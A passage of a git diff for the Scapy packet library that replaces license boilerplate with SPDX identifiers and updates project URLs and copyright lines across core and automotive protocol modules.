Modified by Maxence Tury -# This program is published under a GPLv2 license +# Acknowledgment: Maxence Tury """ Management Information Base (MIB) parsing diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index e2be26752e2..1aa1bb7a019 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# Enhanced by Maxence Tury -# This program is published under a GPLv2 license +# Acknowledgment: Maxence Tury """ Classes that implement ASN.1 data structures. diff --git a/scapy/asn1packet.py b/scapy/asn1packet.py index f968ecb20de..36943fb5f89 100644 --- a/scapy/asn1packet.py +++ b/scapy/asn1packet.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ ASN.1 Packet diff --git a/scapy/automaton.py b/scapy/automaton.py index 549478847fa..b72d799d986 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# Copyright (C) Gabriel Potter """ Automata with states, transitions and actions. diff --git a/scapy/autorun.py b/scapy/autorun.py index f946a56ecfd..fd9df73ce09 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Run commands when the Scapy interpreter starts. diff --git a/scapy/base_classes.py b/scapy/base_classes.py index de557e8b088..63e5c80fa35 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Generators and packet meta classes. diff --git a/scapy/compat.py b/scapy/compat.py index eb55c3d6ba1..594e3cd27ef 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -1,7 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information """ Python 2 and 3 link classes. diff --git a/scapy/config.py b/scapy/config.py index a33123fc152..0833ac3a914 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Implementation of the configuration object. diff --git a/scapy/consts.py b/scapy/consts.py index 22529090f0c..ecff481ed29 100644 --- a/scapy/consts.py +++ b/scapy/consts.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ This file contains constants diff --git a/scapy/contrib/__init__.py b/scapy/contrib/__init__.py index 496a2f92cc1..82f83176f1d 100644 --- a/scapy/contrib/__init__.py +++ b/scapy/contrib/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Package of contrib modules that have to be loaded explicitly. diff --git a/scapy/contrib/altbeacon.py b/scapy/contrib/altbeacon.py index 75ce3aeaf5d..eacbd8532e9 100644 --- a/scapy/contrib/altbeacon.py +++ b/scapy/contrib/altbeacon.py @@ -1,10 +1,7 @@ -# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*- -# altbeacon.py - protocol handlers for AltBeacon -# +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Michael Farrell -# This program is published under a GPLv2 (or later) license # # scapy.contrib.description = AltBeacon BLE proximity beacon # scapy.contrib.status = loads diff --git a/scapy/contrib/aoe.py b/scapy/contrib/aoe.py index d4fccac9ef8..bf608ada0f8 100644 --- a/scapy/contrib/aoe.py +++ b/scapy/contrib/aoe.py @@ -1,6 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2018 antoine.torre -## -# This program is published under a GPLv2 license # scapy.contrib.description = ATA Over Internet diff --git a/scapy/contrib/automotive/__init__.py b/scapy/contrib/automotive/__init__.py index d992d4cd522..bb618a63750 100644 --- a/scapy/contrib/automotive/__init__.py +++ b/scapy/contrib/automotive/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/bmw/__init__.py b/scapy/contrib/automotive/bmw/__init__.py index f06000ab15a..618bfe6c8d2 100644 --- a/scapy/contrib/automotive/bmw/__init__.py +++ b/scapy/contrib/automotive/bmw/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index d47c56a2588..b7b1121ee7a 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = BMW specific definitions for UDS # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/bmw/enumerator.py b/scapy/contrib/automotive/bmw/enumerator.py index b1287bfd3d6..571a9676729 100644 --- a/scapy/contrib/automotive/bmw/enumerator.py +++ b/scapy/contrib/automotive/bmw/enumerator.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = BMW specific enumerators # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index c2dae5e27a3..a4aae1047b4 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = HSFZ - BMW High-Speed-Fahrzeug-Zugang # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/ccp.py b/scapy/contrib/automotive/ccp.py index cfb61571bbf..6ec7eb31475 100644 --- a/scapy/contrib/automotive/ccp.py +++ b/scapy/contrib/automotive/ccp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = CAN Calibration Protocol (CCP) # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 0bb75611d74..b0fd1dbbcf3 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -1,9 +1,9 @@ #! /usr/bin/env python +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = Diagnostic over IP (DoIP) / ISO 13400 # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 9838ff5015c..21bc2c57680 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -1,9 +1,7 @@ -#! /usr/bin/env python - +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = Helper class for tracking Ecu states (Ecu) # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/gm/__init__.py b/scapy/contrib/automotive/gm/__init__.py index 3e4219ec566..b502719fb27 100644 --- a/scapy/contrib/automotive/gm/__init__.py +++ b/scapy/contrib/automotive/gm/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index 586b8631b27..95eea114f0e 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Enrico Pozzobon -# This program is published under a GPLv2 license # scapy.contrib.description = General Motors Local Area Network (GMLAN) # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/gm/gmlan_ecu_states.py b/scapy/contrib/automotive/gm/gmlan_ecu_states.py index fef2563dbc7..682f8a93b85 100644 --- a/scapy/contrib/automotive/gm/gmlan_ecu_states.py +++ b/scapy/contrib/automotive/gm/gmlan_ecu_states.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = GMLAN EcuState modifications # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/gm/gmlan_logging.py b/scapy/contrib/automotive/gm/gmlan_logging.py index de78912b20b..d992c6fd987 100644 --- a/scapy/contrib/automotive/gm/gmlan_logging.py +++ b/scapy/contrib/automotive/gm/gmlan_logging.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = GMLAN Ecu logging additions # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index af9e6521fcf..d3b9c48b4dc 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = GMLAN AutomotiveTestCaseExecutor Utilities # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index a17c23b4202..d211ba93622 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -1,10 +1,8 @@ -#! /usr/bin/env python - +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Markus Schroetter +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license +# Copyright (C) Markus Schroetter # scapy.contrib.description = GMLAN Utilities # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/kwp.py b/scapy/contrib/automotive/kwp.py index 55730629fdd..10679c9fdb5 100644 --- a/scapy/contrib/automotive/kwp.py +++ b/scapy/contrib/automotive/kwp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = Keyword Protocol 2000 (KWP2000) / ISO 14230 # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/obd/__init__.py b/scapy/contrib/automotive/obd/__init__.py index 9d7ebf0032f..c07294b07d7 100644 --- a/scapy/contrib/automotive/obd/__init__.py +++ b/scapy/contrib/automotive/obd/__init__.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/iid/__init__.py b/scapy/contrib/automotive/obd/iid/__init__.py index 9d7ebf0032f..c07294b07d7 100644 --- a/scapy/contrib/automotive/obd/iid/__init__.py +++ b/scapy/contrib/automotive/obd/iid/__init__.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/iid/iids.py b/scapy/contrib/automotive/obd/iid/iids.py index c0d8c2b0854..908f5b66d42 100644 --- a/scapy/contrib/automotive/obd/iid/iids.py +++ b/scapy/contrib/automotive/obd/iid/iids.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/mid/__init__.py b/scapy/contrib/automotive/obd/mid/__init__.py index 9d7ebf0032f..c07294b07d7 100644 --- a/scapy/contrib/automotive/obd/mid/__init__.py +++ b/scapy/contrib/automotive/obd/mid/__init__.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/mid/mids.py b/scapy/contrib/automotive/obd/mid/mids.py index 2bbd2431d12..8aa6b7b5624 100644 --- a/scapy/contrib/automotive/obd/mid/mids.py +++ b/scapy/contrib/automotive/obd/mid/mids.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/obd.py b/scapy/contrib/automotive/obd/obd.py index 0983b6303da..7c1be039bab 100644 --- a/scapy/contrib/automotive/obd/obd.py +++ b/scapy/contrib/automotive/obd/obd.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = On Board Diagnostic Protocol (OBD-II) # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/obd/packet.py b/scapy/contrib/automotive/obd/packet.py index be958298a01..f08d4691901 100644 --- a/scapy/contrib/automotive/obd/packet.py +++ b/scapy/contrib/automotive/obd/packet.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/pid/__init__.py b/scapy/contrib/automotive/obd/pid/__init__.py index 9d7ebf0032f..c07294b07d7 100644 --- a/scapy/contrib/automotive/obd/pid/__init__.py +++ b/scapy/contrib/automotive/obd/pid/__init__.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/pid/pids.py b/scapy/contrib/automotive/obd/pid/pids.py index d3bd84215a1..6367ef1caa5 100644 --- a/scapy/contrib/automotive/obd/pid/pids.py +++ b/scapy/contrib/automotive/obd/pid/pids.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/pid/pids_00_1F.py b/scapy/contrib/automotive/obd/pid/pids_00_1F.py index 3b28c0868a5..4cfc483021b 100644 --- a/scapy/contrib/automotive/obd/pid/pids_00_1F.py +++ b/scapy/contrib/automotive/obd/pid/pids_00_1F.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/pid/pids_20_3F.py b/scapy/contrib/automotive/obd/pid/pids_20_3F.py index f382df5f286..b48e04e18af 100644 --- a/scapy/contrib/automotive/obd/pid/pids_20_3F.py +++ b/scapy/contrib/automotive/obd/pid/pids_20_3F.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/pid/pids_40_5F.py b/scapy/contrib/automotive/obd/pid/pids_40_5F.py index e23f9f2d5f2..116ead96209 100644 --- a/scapy/contrib/automotive/obd/pid/pids_40_5F.py +++ b/scapy/contrib/automotive/obd/pid/pids_40_5F.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/pid/pids_60_7F.py b/scapy/contrib/automotive/obd/pid/pids_60_7F.py index b8e65a3cdff..68e2acdedae 100644 --- a/scapy/contrib/automotive/obd/pid/pids_60_7F.py +++ b/scapy/contrib/automotive/obd/pid/pids_60_7F.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/pid/pids_80_9F.py b/scapy/contrib/automotive/obd/pid/pids_80_9F.py index 99647e430ce..7b9ace0beb8 100644 --- a/scapy/contrib/automotive/obd/pid/pids_80_9F.py +++ b/scapy/contrib/automotive/obd/pid/pids_80_9F.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/pid/pids_A0_C0.py b/scapy/contrib/automotive/obd/pid/pids_A0_C0.py index f4e075d2683..f7a58c572b6 100644 --- a/scapy/contrib/automotive/obd/pid/pids_A0_C0.py +++ b/scapy/contrib/automotive/obd/pid/pids_A0_C0.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/scanner.py b/scapy/contrib/automotive/obd/scanner.py index 345c69c8f6e..ea4141025c0 100644 --- a/scapy/contrib/automotive/obd/scanner.py +++ b/scapy/contrib/automotive/obd/scanner.py @@ -1,9 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Friedrich Feigel # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = OnBoardDiagnosticScanner # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/obd/services.py b/scapy/contrib/automotive/obd/services.py index 296a704a242..f00cf0dd519 100644 --- a/scapy/contrib/automotive/obd/services.py +++ b/scapy/contrib/automotive/obd/services.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/tid/__init__.py b/scapy/contrib/automotive/obd/tid/__init__.py index 9d7ebf0032f..c07294b07d7 100644 --- a/scapy/contrib/automotive/obd/tid/__init__.py +++ b/scapy/contrib/automotive/obd/tid/__init__.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/obd/tid/tids.py b/scapy/contrib/automotive/obd/tid/tids.py index b9e4c371a18..27bda0df58a 100644 --- a/scapy/contrib/automotive/obd/tid/tids.py +++ b/scapy/contrib/automotive/obd/tid/tids.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/scanner/__init__.py b/scapy/contrib/automotive/scanner/__init__.py index c3a657f8abf..8be8d76679b 100644 --- a/scapy/contrib/automotive/scanner/__init__.py +++ b/scapy/contrib/automotive/scanner/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = Automotive Scanner Library # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/scanner/configuration.py b/scapy/contrib/automotive/scanner/configuration.py index 8fff6965f43..1fea54b6026 100644 --- a/scapy/contrib/automotive/scanner/configuration.py +++ b/scapy/contrib/automotive/scanner/configuration.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = AutomotiveTestCaseExecutorConfiguration # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 26aaf73254d..e04ee346341 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = ServiceEnumerator definitions # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index fac15cd5f92..c171a8817f5 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = AutomotiveTestCaseExecutor base class # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/scanner/graph.py b/scapy/contrib/automotive/scanner/graph.py index 6b120b2fa2b..697fca6d9f1 100644 --- a/scapy/contrib/automotive/scanner/graph.py +++ b/scapy/contrib/automotive/scanner/graph.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = Graph library for AutomotiveTestCaseExecutor # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py index 0a88f58747c..b13535d8737 100644 --- a/scapy/contrib/automotive/scanner/staged_test_case.py +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = Staged AutomotiveTestCase base classes # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/scanner/test_case.py b/scapy/contrib/automotive/scanner/test_case.py index 58ef38007c7..99f2bcda829 100644 --- a/scapy/contrib/automotive/scanner/test_case.py +++ b/scapy/contrib/automotive/scanner/test_case.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = TestCase base class definitions # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/someip.py b/scapy/contrib/automotive/someip.py index 105a188b217..1bb491644bc 100644 --- a/scapy/contrib/automotive/someip.py +++ b/scapy/contrib/automotive/someip.py @@ -1,29 +1,8 @@ -# MIT License - -# Copyright (c) 2018 Jose Amores - -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: - -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. - -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. - +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Sebastian Baar -# This program is published under a GPLv2 license +# Copyright (c) 2018 Jose Amores # scapy.contrib.description = Scalable service-Oriented MiddlewarE/IP (SOME/IP) # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 7bf4740bea3..4df8a505a3a 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = Unified 